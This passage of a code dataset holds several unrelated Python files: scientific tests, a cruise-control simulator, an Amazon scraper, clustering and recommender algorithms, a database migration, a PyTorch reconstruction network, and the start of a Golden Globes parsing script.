hsf.roiloc_wrapper.get_mri(mris[0], mask_pattern=\"mask.nii.gz\")\n assert isinstance(mask, ants.ANTsImage)\n mri, mask = hsf.roiloc_wrapper.get_mri(mris[0],\n mask_pattern=\"no_mask.nii.gz\")\n assert isinstance(mri, ants.ANTsImage)\n assert mask == None\n\n _, right, left = hsf.roiloc_wrapper.get_hippocampi(mri, {\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2],\n \"roi\": \"hippocampus\"\n }, mask)\n\n assert isinstance(right, ants.ANTsImage)\n assert isinstance(left, ants.ANTsImage)\n\n # Saving to {tmpdir}/tse_{side}_hippocampus.nii.gz\n hsf.roiloc_wrapper.save_hippocampi(right, left, models_path, mris[0])\n\n\n# Segmentation\ndef test_segment(models_path, config, deepsparse_inference_engines):\n \"\"\"Tests that we can segment and save a hippocampus.\"\"\"\n mri = models_path / \"tse_right_hippocampus.nii.gz\"\n sub = hsf.segment.mri_to_subject(mri)\n sub = [sub, sub]\n\n for ca_mode in [\"1/23\", \"123\", \"\"]:\n _, pred = hsf.segment.segment(\n subjects=sub,\n augmentation_cfg=config.augmentation,\n segmentation_cfg=config.segmentation.segmentation,\n n_engines=1,\n engines=deepsparse_inference_engines,\n ca_mode=ca_mode,\n batch_size=2)\n\n hsf.segment.save_prediction(mri, pred)\n\n\ndef test_multispectrality(models_path):\n \"\"\"Tests that we can co-locate hippocampi in another contrast.\"\"\"\n config = DictConfig({\n \"files\": {\n \"output_dir\": 
str(models_path)\n },\n \"multispectrality\": {\n \"pattern\": \"tse.nii.gz\",\n \"same_space\": False,\n \"registration\": {\n \"type_of_transform\": \"AffineFast\"\n }\n }\n })\n\n mri = hsf.roiloc_wrapper.load_from_config(models_path, \"tse.nii.gz\")[0]\n second_contrast = hsf.multispectrality.get_second_contrast(\n mri, \"tse.nii.gz\")\n\n registered = hsf.multispectrality.register(\n mri, second_contrast,\n DictConfig({\"multispectrality\": {\n \"same_space\": True\n }}))\n registered = hsf.multispectrality.register(mri, second_contrast, config)\n\n img = ants.image_read(str(mri), reorient=\"LPI\")\n locator, _, _ = hsf.roiloc_wrapper.get_hippocampi(img, {\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2],\n \"roi\": \"hippocampus\"\n }, None)\n\n _, _ = hsf.multispectrality.get_additional_hippocampi(\n mri, registered, locator, config)\n\n\ndef test_uncertainty():\n \"\"\"Tests that uncertainty can be computed.\"\"\"\n n_classes = 1\n sample_probs = torch.randn(1, n_classes, 16, 16, 16)\n\n unc = hsf.uncertainty.voxelwise_uncertainty(sample_probs)\n\n assert unc.shape == (16, 16, 16)\n","repo_name":"clementpoiret/HSF","sub_path":"tests/test_hsf.py","file_name":"test_hsf.py","file_ext":"py","file_size_in_byte":7436,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13968784458","text":"import pandas as pd\n\n\nm_car = 300 # kg\nmax_F = 8000 # N\nmin_F = -8000 # N\ndelay_factor = 0.5\ncda = 0.4 # drag coefficient\nrf = 0.05 # rolling resistance\n\nKp = 2\nKi = 0.1\nmax_error_int = 10\ntarget_speed_list = [50, 100, 0, 70] # km/h\n\ndt = 0.1 # sec\nresponce = 5 # How often does the system respond (once per responce)\nsim_time = 15 # sec\nresponce_period = responce * dt\n\ntarget_speed_mode = 1\nstate_log =[]\n\n\ndef main():\n df = None\n error_int = 0\n state = {\n 'time': 0,\n 'speed': 0,\n 'force': 0,\n 'acc': 0,\n 'force_drag': 0\n }\n count = 0\n target_speed_base = target_speed_list[count % 4]\n break_time = sim_time\n log_list = []\n score = 0\n \n current_responce = 0\n \n while count < 8:\n if state['time'] > break_time:\n break_time += sim_time\n count += 1\n target_speed_base = target_speed_list[count % 4]\n \n if state[\"time\"] >= current_responce:\n current_responce += responce_period\n target_speed = target_speed_base\n error = target_speed - state['speed']\n error_int += error * responce_period\n score += abs(error * responce_period)\n # error_int = max(min(error_int, max_error_int), -max_error_int)\n P_action = Kp * error\n I_action = Ki * error_int\n \n throttle = P_action + I_action\n \n target_force = throttle / 100 * max_F\n \n # car simulator\n state = sim_car(target_force, state)\n \n # log data\n log_dict = {\n **state,\n 'error': error,\n 'error_int': error_int,\n 'P_action': P_action,\n 'I_action': I_action,\n 'target_force': target_force,\n 'target_speed': target_speed\n }\n log_list.append(log_dict)\n \n \n \n key_list = []\n for key in log_dict.keys():\n key_list.append(key)\n pd.DataFrame(log_list, columns=key_list).to_csv(\"data.csv\", header=key_list)\n \n print(\"The final score is: %f\" % score)\n \n\n\ndef sim_car(target_force, state):\n \n # add delay factor to simulate engine\n force = state['force'] * delay_factor + target_force * (1 - delay_factor)\n force = max(min(force, max_F), min_F)\n \n velocity = state['speed'] / 3.6\n \n # drag force\n force_drag = (0.5 * 1.225 * velocity * velocity * cda + rf * m_car * 9.81) * sign(velocity)\n \n acc = (force - force_drag) / m_car\n velocity += acc * 
dt\n    \n    state['time'] += dt\n    state['force'] = force\n    state['speed'] = velocity * 3.6\n    state['acc'] = acc\n    state['force_drag'] = force_drag\n    \n    return state\n\n\ndef sign(x):\n    return 1 if x >= 0 else -1\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"gpeteinatos/PID","sub_path":"cruise_control.py","file_name":"cruise_control.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13066830326","text":"\n\nimport datetime\nimport re\nimport time\nimport urllib.request\n\n\nimport requests\nimport pymysql\nfrom requests.exceptions import RequestException\nfrom lxml import etree\n\nfrom selenium import webdriver\n\n\ndef get_one_page(url):\n    driver = webdriver.Chrome()\n\n    driver.get(url)\n    html = driver.page_source\n    driver.quit()\n    return html\n\n\n\n\ndef Python_sel_Mysql():\n    # use the cursor() method to get an operation cursor\n    connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='Amazon',\n                                 charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n    cur = connection.cursor()\n    # SQL statement\n    try:\n\n        for i in range(1,888):\n            sql = 'select f_blink from Final_linkTable where id = %s ' % i\n            # # execute the SQL statement\n            cur.execute(sql)\n            # # fetch one record\n            data = cur.fetchone()\n            book_link = data['f_blink']\n            yield book_link\n    except :\n        print(\"let it pass\")\n\n\n\ndef parse_page1(html):\n    selector = etree.HTML(html)\n    book_name = selector.xpath('//*[@id=\"ebooksProductTitle\"]/text()')\n    author = selector.xpath('//*[@id=\"buybox\"]/div/table/tbody/tr[2]/td[2]/text()')\n    r_book_name = remove_block(book_name)\n    r_author = remove_block(author)\n\n\n\n    book_name1 = if_isnull(r_book_name)\n    author1 = if_isnull(r_author)\n    return r_book_name,r_author\n    # for i1,i2 in zip(book_name1,author1):\n\n\n\n\ndef remove_block(items):\n    new_items = []\n    for it in items:\n        f = \"\".join(it.split())\n        new_items.append(f)\n    return new_items\n\n\n\ndef if_isnull(content):\n    if_list =[]\n\n    if content ==None:\n        f_content = ''\n        if_list.append(f_content)\n    else:\n\n        f_content =content\n        if_list = f_content\n    return if_list\n\ntest_list = ['https://www.amazon.cn/dp/B07K9MM446',\n             'https://www.amazon.cn/dp/B07QYM82RQ',\n             'https://www.amazon.cn/dp/B07SFTNKLS']\n\nif __name__ == '__main__':\n\n    # for url_str in Python_sel_Mysql():\n    for url_str in test_list:\n        html = get_one_page(url_str)\n        content =parse_page1(html)\n        print(content)\n\n\n\n","repo_name":"mojoru2023/ProjectFor_Spiders","sub_path":"async_aiohttp_Test/Test16.py","file_name":"Test16.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24442953128","text":"\"\"\"\nProject 3: Closest Pairs and Clustering Algorithms\n\"\"\"\nimport math\nimport alg_cluster\n\n######################### Code for closest pairs of clusters #########################\n\n\ndef pair_distance(cluster_list, idx1, idx2):\n    \"\"\"\n    Helper function that computes Euclidean distance between two clusters in a list\n    Input: cluster_list is list of clusters, idx1 and idx2 are integer indices for two clusters\n    Output: tuple (dist, idx1, idx2) where dist is distance between cluster_list[idx1] and cluster_list[idx2]\n    \"\"\"\n    return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2), max(idx1, idx2))\n\n\ndef slow_closest_pair(cluster_list):\n    \"\"\"\n    Compute the distance between the closest pair of clusters in a list (slow)\n    Input: cluster_list is the 
list of clusters\n \n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \"\"\"\n if len(cluster_list) <= 1:\n return (0, 0, 0)\n minimum_distance = float('inf')\n idx1, idx2 = -1, -1\n for cluster_index, cluster in enumerate(cluster_list):\n for other_cluster_index, other_cluster in enumerate(cluster_list[cluster_index+1:], cluster_index+1):\n if cluster_index != other_cluster_index:\n current_distance = cluster.distance(other_cluster)\n if current_distance < minimum_distance:\n minimum_distance = current_distance\n idx1, idx2 = cluster_index, other_cluster_index\n return (minimum_distance, idx1, idx2)\n\n\ndef get_min_tuple(tuple_a, tuple_b):\n '''\n return the tuple with smalles first entry\n '''\n temporary_list = [tuple_a, tuple_b]\n temporary_list.sort(key=lambda x: x[0])\n return temporary_list[0]\n\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute the distance between the closest pair of clusters in a list\n Input: cluster_list is list of clusters SORTED such that horizontal positions of their centers are in ascending order\n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \"\"\"\n cluster_count = len(cluster_list)\n if cluster_count <= 3:\n return slow_closest_pair(cluster_list)\n else:\n mid_position = int(cluster_count // 2)\n left_list = cluster_list[: mid_position]\n right_list = cluster_list[mid_position:]\n mid = 0.5 * (left_list[-1].horiz_center() +\n right_list[0].horiz_center())\n left_tuple = fast_closest_pair(left_list)\n right_dist, right_id1, right_id2 = fast_closest_pair(right_list)\n right_tuple = (right_dist, right_id1 + mid_position,\n right_id2 + mid_position)\n min_tuple = get_min_tuple(left_tuple, right_tuple)\n strip_tuple = closest_pair_strip(cluster_list, mid, min_tuple[0])\n min_tuple = get_min_tuple(min_tuple, strip_tuple)\n return min_tuple\n\n\ndef closest_pair_strip(cluster_list, horiz_center, half_width):\n \"\"\"\n Helper function to compute the closest pair of clusters in a vertical strip\n Input: cluster_list is a list of clusters produced by fast_closest_pair\n horiz_center is the horizontal position of the strip's vertical center line\n half_width is the half the width of the strip (i.e; the maximum horizontal distance that a cluster can lie from the center line)\n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] lie in the strip and have minimum distance dist. 
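\n\n    A hedged usage sketch (assuming the five-argument alg_cluster.Cluster(fips_codes,\n    horiz, vert, population, risk) constructor used in kmeans_clustering below):\n        clusters = [alg_cluster.Cluster(set(), x, 0.0, 0, 0) for x in [0.0, 1.0, 1.1, 3.0]]\n        closest_pair_strip(clusters, 1.05, 0.2) # -> (0.1, 1, 2), up to float rounding\n    Only the clusters at x = 1.0 and x = 1.1 lie in the strip, so they form the pair.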
\n \"\"\"\n defalut_tuple = (float('inf'), -1, -1)\n in_strip_pair = [(index, cluster) for index, cluster in enumerate(cluster_list)\n if abs(cluster.horiz_center() - horiz_center) < half_width]\n\n in_strip_pair.sort(key=lambda pair: pair[1].vert_center())\n if len(in_strip_pair) <= 1:\n return defalut_tuple\n\n in_strip_index, in_strip = zip(*in_strip_pair)\n for cluster_index, cluster in enumerate(in_strip[:-1]):\n other_loop = in_strip[cluster_index+1: cluster_index+4]\n for other_cluster_index, other_cluster in enumerate(other_loop, cluster_index+1):\n current_distance = cluster.distance(other_cluster)\n if current_distance < defalut_tuple[0]:\n defalut_tuple = (current_distance,\n cluster_index, other_cluster_index)\n\n id_original = (in_strip_index[defalut_tuple[1]],\n in_strip_index[defalut_tuple[2]])\n defalut_tuple = (defalut_tuple[0], min(id_original), max(id_original))\n return defalut_tuple\n\n######################### Code for hierarchical clustering ###########################\n\n\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters. Note that the function may mutate cluster_list\n Input: List of clusters, integer number of clusters\n Output: List of clusters whose length is num_clusters\n \"\"\"\n cluster_list_copy = [clu.copy() for clu in cluster_list]\n cluster_count = len(cluster_list)\n while cluster_count > num_clusters:\n cluster_list_copy.sort(key=lambda clu: clu.horiz_center())\n _, id1, id2 = fast_closest_pair(cluster_list_copy)\n cluster_list_copy[id1].merge_clusters(cluster_list_copy.pop(id2))\n cluster_count -= 1\n\n return cluster_list_copy\n\n######################### Code for k-means clustering ################################\n\n\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters. 
Note that the function may not mutate cluster_list\n    Input: List of clusters, integers number of clusters and number of iterations\n    Output: List of clusters whose length is num_clusters\n    \"\"\"\n    # position initial clusters at the location of clusters with largest populations\n    cluster_list_copy, id_population_pair = zip(*[(clu.copy(), (index, clu.total_population()))\n                                                  for index, clu in enumerate(cluster_list)])\n    id_population_pair = list(id_population_pair)\n    id_population_pair.sort(key=lambda x: -x[1])\n    initial_cluster = [cluster_list_copy[id_population_pair[pair_id][0]]\n                       for pair_id in range(num_clusters)]\n\n    for dummy_iter in range(num_iterations):\n        initial_cluster = [alg_cluster.Cluster(set([]), clu.horiz_center(\n        ), clu.vert_center(), 0, 0) for clu in initial_cluster]\n\n        holder_cluster = [clu.copy() for clu in initial_cluster]\n        for cluster in cluster_list_copy:\n            initial_cluster_dist_id = [(index, cluster.distance(\n                clu)) for index, clu in enumerate(initial_cluster)]\n            initial_cluster_dist_id.sort(key=lambda x: x[1])\n            min_id = initial_cluster_dist_id[0][0]\n            holder_cluster[min_id].merge_clusters(cluster)\n\n        initial_cluster = holder_cluster\n    return initial_cluster\n","repo_name":"mohdsinad/Algorithmic_Thinking_Coursera_RiceUni","sub_path":"Week 6/Closest Pairs and Clustering Algorithms.py","file_name":"Closest Pairs and Clustering Algorithms.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28738030490","text":"import gc\n\nimport numpy as np\nfrom scipy import linalg\n\nfrom ..definitions import InteractionMatrix\nfrom ..optimization.parameter_range import LogUniformFloatRange\nfrom .base import BaseSimilarityRecommender, RecommenderConfig\n\n\nclass DenseSLIMConfig(RecommenderConfig):\n    reg: float = 1\n\n\nclass DenseSLIMRecommender(BaseSimilarityRecommender):\n    \"\"\"Implementation of DenseSLIM or Embarrassingly Shallow AutoEncoder (EASE ^R).\n\n    See:\n\n    - `Embarrassingly Shallow Autoencoders for Sparse Data\n      `_\n\n    Args:\n        X_train_all (Union[scipy.sparse.csr_matrix, scipy.sparse.csc_matrix]):\n            Input interaction matrix.\n\n        reg (float, optional):\n            The regularization parameter for ease. 
Defaults to 1.0.\n \"\"\"\n\n default_tune_range = [LogUniformFloatRange(\"reg\", 1, 1e4)]\n config_class = DenseSLIMConfig\n\n def __init__(self, X_train_all: InteractionMatrix, reg: float = 1):\n\n super(DenseSLIMRecommender, self).__init__(X_train_all)\n self.reg = reg\n\n def _learn(self) -> None:\n X_train_all_f32 = self.X_train_all.astype(np.float32)\n P = X_train_all_f32.T.dot(X_train_all_f32)\n P_dense: np.ndarray = P.todense()\n del P\n P_dense[np.arange(self.n_items), np.arange(self.n_items)] += self.reg\n gc.collect()\n P_dense = linalg.inv(P_dense, overwrite_a=True)\n\n gc.collect()\n diag_P_inv = 1 / np.diag(P_dense)\n P_dense *= -diag_P_inv[np.newaxis, :]\n range_ = np.arange(self.n_items)\n P_dense[range_, range_] = 0\n self._W = P_dense\n","repo_name":"tohtsky/irspack","sub_path":"src/irspack/recommenders/dense_slim.py","file_name":"dense_slim.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"33600498605","text":"import sqlite3\n\n# class Database: This class contains the SQL connection & cursor\nclass Database (object):\n \"\"\" Database object:\n Contains the SQL database Connection and Cursor\"\"\"\n\n def __init__(self):\n self.filename = None\n self.conn = None\n self.cursor = None\n\n def open_db (self, filename = 'oyd_daily.db'):\n \"\"\" Database Object: open_db method\n Opens the SQL database\n Parameters: database - default 'rooster.db'\n Returns: Connection, Cursor - for the SQL database\"\"\"\n\n self.filename = filename\n\n try:\n self.conn = sqlite3.connect(filename)\n except:\n print(f\"ERROR: unable to open database: {filename}\")\n exit(1)\n\n # get the cursor for the database\n self.cursor = self.conn.cursor()\n\n return 0\n\n def close_db (self):\n try:\n self.conn.close()\n self.conn = None\n self.cursor = None\n return 0\n except:\n return 1\n","repo_name":"skapoor8/python","sub_path":"projects/DailyDataAPI/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20443410198","text":"\"\"\"Add tx_retries table\n\nRevision ID: 0704901102eb\nRevises: 5cebc0f48f6e\nCreate Date: 2021-08-02 21:46:46.095406\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '0704901102eb'\ndown_revision = '5cebc0f48f6e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'tx_retries', sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('order_id', sa.Integer, sa.ForeignKey('orders.id')),\n sa.Column('last_attempt', sa.DateTime),\n sa.Column('retry_count', sa.Integer, default=0),\n sa.Column('region_code', sa.Integer),\n sa.Column('pending', sa.Boolean, default=True),\n sa.Column('created_at', sa.DateTime, default=sa.func.now()))\n\n\ndef downgrade():\n op.drop_table('tx_retries')\n","repo_name":"Blockstream/satellite-api","sub_path":"server/alembic/versions/0704901102eb_add_tx_retries_table.py","file_name":"0704901102eb_add_tx_retries_table.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"21098508407","text":"import math\r\nimport torch\r\nimport numpy as np\r\nimport torch.nn as nn\r\nfrom torch.nn import init\r\nfrom itertools import repeat\r\nimport torch.nn.functional as F\r\n# from torch._six import container_abcs\r\nimport collections.abc as 
container_abcs\r\nfrom torch.nn.modules.module import Module\r\nfrom .layers import unetConv2, unetUp\r\nfrom utils.util import init_weights, count_param\r\nimport models\r\n\r\n\r\ndef _ntuple(n):\r\n    def parse(x):\r\n        if isinstance(x, container_abcs.Iterable): # isinstance(): check whether x is an instance of the given type\r\n            return x\r\n        return tuple(repeat(x, n))\r\n    return parse\r\n\r\n\r\n_pair = _ntuple(2)\r\n\r\n\r\nclass UNet(nn.Module):\r\n\r\n    def __init__(self, in_channels=1, n_classes=1, feature_scale=2, is_deconv=True, is_batchnorm=True):\r\n        super(UNet, self).__init__()\r\n        self.in_channels = in_channels\r\n        self.feature_scale = feature_scale\r\n        self.is_deconv = is_deconv\r\n        self.is_batchnorm = is_batchnorm\r\n\r\n        filters = [32, 64, 128, 256]\r\n\r\n        # downsampling\r\n        self.maxpool = nn.MaxPool2d(kernel_size=2)\r\n        self.conv1 = unetConv2(self.in_channels, filters[0], self.is_batchnorm)\r\n        self.conv2 = unetConv2(filters[0], filters[1], self.is_batchnorm)\r\n        self.conv3 = unetConv2(filters[1], filters[2], self.is_batchnorm)\r\n        self.center = unetConv2(filters[2], filters[3], self.is_batchnorm)\r\n        # upsampling\r\n        self.up_concat3 = unetUp(filters[3], filters[2], self.is_deconv)\r\n        self.up_concat2 = unetUp(filters[2], filters[1], self.is_deconv)\r\n        self.up_concat1 = unetUp(filters[1], filters[0], self.is_deconv)\r\n        # final conv (without any concat)\r\n        self.final = nn.Conv2d(filters[0], n_classes, 1)\r\n\r\n        # initialise weights\r\n        for m in self.modules():\r\n            if isinstance(m, nn.Conv2d):\r\n                init_weights(m, init_type='kaiming')\r\n            elif isinstance(m, nn.BatchNorm2d):\r\n                init_weights(m, init_type='kaiming')\r\n\r\n    def forward(self, inputs):\r\n        conv1 = self.conv1(inputs) # 16*512*512\r\n        maxpool1 = self.maxpool(conv1) # 16*256*256\r\n\r\n        conv2 = self.conv2(maxpool1) # 32*256*256\r\n        maxpool2 = self.maxpool(conv2) # 32*128*128\r\n\r\n        conv3 = self.conv3(maxpool2) # 64*128*128\r\n        maxpool3 = self.maxpool(conv3) # 64*64*64\r\n\r\n        center = self.center(maxpool3) # 256*32*32\r\n        up3 = self.up_concat3(center, conv3) # 64*128*128\r\n        up2 = self.up_concat2(up3, conv2) # 32*256*256\r\n        up1 = self.up_concat1(up2, conv1) # 16*512*512\r\n\r\n        final = self.final(up1)\r\n\r\n        return final\r\n\r\n\r\nclass Conv(Module):\r\n    def __init__(self, config, ic, oc):\r\n        super(Conv, self).__init__()\r\n        self.config = config\r\n        self.ic = ic\r\n        self.oc = oc\r\n        self.w = nn.Parameter(torch.Tensor(oc, ic, 9))\r\n        self.padding = _pair(1)\r\n        self.init = nn.Parameter(torch.zeros([ic, 9, 9], dtype=torch.float32))\r\n        init.kaiming_uniform_(self.w, a=math.sqrt(5)) # Kaiming uniform initialization\r\n\r\n    def forward(self, inputs):\r\n        # torch.eye(n): 2-D tensor with ones on the diagonal and zeros elsewhere\r\n        # torch.einsum performs the matrix multiplication\r\n        init = self.init + torch.eye(9, dtype=torch.float32).unsqueeze(0).repeat((self.ic, 1, 1)).to(self.config.device)\r\n        weight = torch.reshape(torch.einsum('abc, dac->dab', init, self.w), (self.oc, self.ic, 3, 3))\r\n        outputs = F.conv2d(inputs, weight, None, 1, self.padding)\r\n        return outputs\r\n\r\n\r\nclass pre_layer(nn.Module):\r\n    def __init__(self, config):\r\n        super(pre_layer, self).__init__()\r\n\r\n        self.unet = UNet()\r\n\r\n\r\n    def forward(self, x_recon):\r\n\r\n        x_recon = torch.transpose(x_recon, 0, 1).reshape([-1, 1, 32, 32]) # [9,1024]->[9,1,32,32]\r\n        x_output = self.unet(x_recon)\r\n\r\n        x_output = torch.transpose(x_output.reshape(-1, 1024), 0, 1) # [1024,9]\r\n        return x_output\r\n\r\n\r\nclass post_layer(nn.Module):\r\n    def __init__(self, config):\r\n        super(post_layer, self).__init__()\r\n\r\n        self.unet = UNet()\r\n\r\n        self.conv_out = 
nn.Sequential(\r\n            nn.ReLU(),\r\n            Conv(config, 32, 32),\r\n            Conv(config, 32, 32),\r\n            Conv(config, 32, 1),\r\n        )\r\n\r\n    def forward(self, x_recon):\r\n        x_output = self.unet(x_recon)\r\n        return x_output\r\n\r\n\r\nclass HybridNet(nn.Module):\r\n    def __init__(self, config):\r\n        super(HybridNet, self).__init__()\r\n        self.config = config\r\n        self.phi_size = 32\r\n        points = self.phi_size ** 2\r\n        phi_init = np.random.normal(0.0, (1 / points) ** 0.5, size=(int(config.ratio * points), points)) # draw random samples from a normal (Gaussian) distribution\r\n        self.phi = nn.Parameter(torch.from_numpy(phi_init).float(), requires_grad=False)\r\n        self.Q = nn.Parameter(torch.from_numpy(np.transpose(phi_init)).float(), requires_grad=False)\r\n\r\n        self.num_layers = 6\r\n        self.pre_block = nn.ModuleList()\r\n        for i in range(self.num_layers):\r\n            self.pre_block.append(pre_layer(config))\r\n\r\n        self.post_block = nn.ModuleList()\r\n        for i in range(self.num_layers):\r\n            self.post_block.append(post_layer(config))\r\n\r\n        self.threshold = nn.Parameter(torch.Tensor([0.01]), requires_grad=False)\r\n        self.weights = []\r\n        self.etas = []\r\n        self.alphas = []\r\n        self.betas = []\r\n\r\n        alp = 0.9\r\n        bet = 0.8\r\n\r\n        for i in range(self.num_layers):\r\n            self.weights.append(nn.Parameter(torch.tensor(1.), requires_grad=False))\r\n            self.register_parameter(\"eta_\" + str(i + 1), nn.Parameter(torch.tensor(0.1), requires_grad=False)) # todo\r\n            self.etas.append(eval(\"self.eta_\" + str(i + 1)))\r\n            self.register_parameter(\"alpha_\" + str(i + 1), nn.Parameter(torch.tensor(alp), requires_grad=False)) # todo\r\n            self.alphas.append(eval(\"self.alpha_\" + str(i + 1)))\r\n            self.register_parameter(\"beta_\" + str(i + 1), nn.Parameter(torch.tensor(bet), requires_grad=False)) # todo\r\n            self.betas.append(eval(\"self.beta_\" + str(i + 1)))\r\n\r\n    def forward(self, inputs):\r\n        batch_size = inputs.size(0) # inputs [1,1,96,96]\r\n        # inputs = torch.unsqueeze(inputs,0) # complex\r\n        y = self.sampling(inputs, self.phi_size)\r\n        recon = self.recon(y, self.phi_size, batch_size) # inputs [1,1,96,96]\r\n        return recon\r\n\r\n    def sampling(self, inputs, init_block):\r\n        inputs = torch.cat(torch.split(inputs, split_size_or_sections=init_block, dim=3), dim=0)\r\n        inputs = torch.cat(torch.split(inputs, split_size_or_sections=init_block, dim=2), dim=0)\r\n        inputs = torch.reshape(inputs, [-1, init_block ** 2])\r\n        inputs = torch.transpose(inputs, 0, 1)\r\n        y = torch.matmul(self.phi, inputs)\r\n        return y\r\n\r\n    def recon(self, y, init_block, batch_size):\r\n        idx = int(self.config.block_size / init_block)\r\n\r\n        recon = torch.matmul(self.Q, y) #[1024,9]\r\n        xp = recon\r\n        x = recon\r\n        for i in range(self.num_layers):\r\n            if i != 0:\r\n                x = (1-self.alphas[i]) * xp + (self.alphas[i]-self.betas[i]) * recon\r\n                xp = recon\r\n            recon = recon - self.weights[i] * torch.mm(torch.transpose(self.phi, 0, 1), (torch.mm(self.phi, recon) - y))\r\n            recon = recon - self.pre_block[i](recon) # [1024,9]\r\n            recon = torch.reshape(torch.transpose(recon, 0, 1), [-1, 1, init_block, init_block]) # [9,1,32,32]\r\n            recon = torch.mul(torch.sign(recon), F.relu(torch.abs(recon) - self.threshold))\r\n            recon = recon - self.post_block[i](recon)\r\n            recon = torch.reshape(recon, [-1, init_block ** 2])\r\n            recon = torch.transpose(recon, 0, 1) # [1024,9]\r\n\r\n            if i != 0:\r\n                recon = x + self.betas[i] * recon\r\n\r\n\r\n        recon = torch.reshape(torch.transpose(recon, 0, 1), [-1, 1, init_block, init_block]) # [9,1,32,32]\r\n        recon = torch.cat(torch.split(recon, split_size_or_sections=idx * batch_size, dim=0), dim=2) 
#[3,1,96,32]\r\n recon = torch.cat(torch.split(recon, split_size_or_sections=batch_size, dim=0), dim=3) #[1,1,96,96]\r\n return recon\r\n\r\n","repo_name":"ICSResearch/LTwIST","sub_path":"models/demo_unet.py","file_name":"demo_unet.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19510604187","text":"import copy\nimport json\nimport re\nimport spacy\nimport sys\nimport time\nfrom difflib import SequenceMatcher\nfrom spacy.tokenizer import Tokenizer\n\nOFFICIAL_AWARDS_1315 = ['cecil b. demille award', 'best motion picture - drama',\n 'best performance by an actress in a motion picture - drama',\n 'best performance by an actor in a motion picture - drama',\n 'best motion picture - comedy or musical',\n 'best performance by an actress in a motion picture - comedy or musical',\n 'best performance by an actor in a motion picture - comedy or musical',\n 'best animated feature film', 'best foreign language film',\n 'best performance by an actress in a supporting role in a motion picture',\n 'best performance by an actor in a supporting role in a motion picture',\n 'best director - motion picture', 'best screenplay - motion picture',\n 'best original score - motion picture', 'best original song - motion picture',\n 'best television series - drama',\n 'best performance by an actress in a television series - drama',\n 'best performance by an actor in a television series - drama',\n 'best television series - comedy or musical',\n 'best performance by an actress in a television series - comedy or musical',\n 'best performance by an actor in a television series - comedy or musical',\n 'best mini-series or motion picture made for television',\n 'best performance by an actress in a mini-series or motion picture made for television',\n 'best performance by an actor in a mini-series or motion picture made for television',\n 'best performance by an actress in a supporting role in a series, mini-series or motion picture made for television',\n 'best performance by an actor in a supporting role in a series, mini-series or motion picture made for television']\nOFFICIAL_AWARDS_1819 = ['best motion picture - drama', 'best motion picture - musical or comedy',\n 'best performance by an actress in a motion picture - drama',\n 'best performance by an actor in a motion picture - drama',\n 'best performance by an actress in a motion picture - musical or comedy',\n 'best performance by an actor in a motion picture - musical or comedy',\n 'best performance by an actress in a supporting role in any motion picture',\n 'best performance by an actor in a supporting role in any motion picture',\n 'best director - motion picture', 'best screenplay - motion picture',\n 'best motion picture - animated', 'best motion picture - foreign language',\n 'best original score - motion picture', 'best original song - motion picture',\n 'best television series - drama', 'best television series - musical or comedy',\n 'best television limited series or motion picture made for television',\n 'best performance by an actress in a limited series or a motion picture made for television',\n 'best performance by an actor in a limited series or a motion picture made for television',\n 'best performance by an actress in a television series - drama',\n 'best performance by an actor in a television series - drama',\n 'best performance by an actress in a television series - musical or comedy',\n 'best performance by an actor in a television 
series - musical or comedy',\n 'best performance by an actress in a supporting role in a series, limited series or motion picture made for television',\n 'best performance by an actor in a supporting role in a series, limited series or motion picture made for television',\n 'cecil b. demille award']\n\nnlp = spacy.load('en_core_web_sm')\nner = spacy.load('en_core_web_sm', disable=['parser', 'tagger'])\ntokenizer = Tokenizer(nlp.vocab)\ncustom_stop_words = [\n 'Golden Globes', 'goldenglobes', '@', 'golden globes', 'RT', 'GoldenGlobes', '\\n', '#', '#GoldenGlobes', 'gg',\n 'Golden Globe.', 'Golden Globe', 'golden globe', '@goldenglobes', '@GG', '@gg', '#goldenglobes', '#gg', '#GG',\n 'Golden Globes.', '@GoldenGlobes', 'tonight', 'this year', 'last year', 'next year', 'the golden globes',\n 'The Golden Globes', 'the goldenglobes', 'the GoldenGlobes', 'The goldenglobes', 'The GoldenGlobes',\n 'the Golden Globes', 'The golden globes', 'rt', 'golden', 'Golden', 'globes', 'Globes', 'GoldenGlobe', 'the year',\n 'Globe', 'globe', 'award', 'awards', 'Awards', 'Award', 